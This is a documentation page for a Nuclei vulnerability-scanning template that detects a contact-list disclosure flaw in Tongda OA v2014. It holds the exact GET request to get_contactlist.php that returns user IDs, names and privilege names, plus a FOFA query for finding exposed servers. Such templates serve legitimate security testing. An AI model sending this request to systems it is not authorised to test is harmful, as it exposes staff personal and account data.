Tongda OA v2014 Get Contactlistt - Sensitive Information Disclosure
ID: tongda-contact-list-exposure
Severity: medium
Author: SleepingBag945
Tags: tongda,oa,exposure
Description
Section titled “Description”There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks.
YAML Source
Section titled “YAML Source”id: tongda-contact-list-exposure
info: name: Tongda OA v2014 Get Contactlistt - Sensitive Information Disclosure author: SleepingBag945 severity: medium description: | There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks. reference: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-contact-list-disclosure.yaml metadata: verified: true max-request: 1 fofa-query: app="TDXK-通达OA" tags: tongda,oa,exposure
http: - method: GET path: - "{{BaseURL}}/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3"
matchers-condition: and matchers: - type: word words: - 'user_uid":' - 'user_name":' - 'priv_name":' condition: and
- type: status status: - 200# digest: 490a0046304402205ee5b04767e0aee93fcd332cb022095f8abc0c2f8c540bbf8194a19d3b18a96b02207b5e5e6ad36481367b24b21cbddc966837a80026c537f6c4dcbfd11e335be1b4:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml"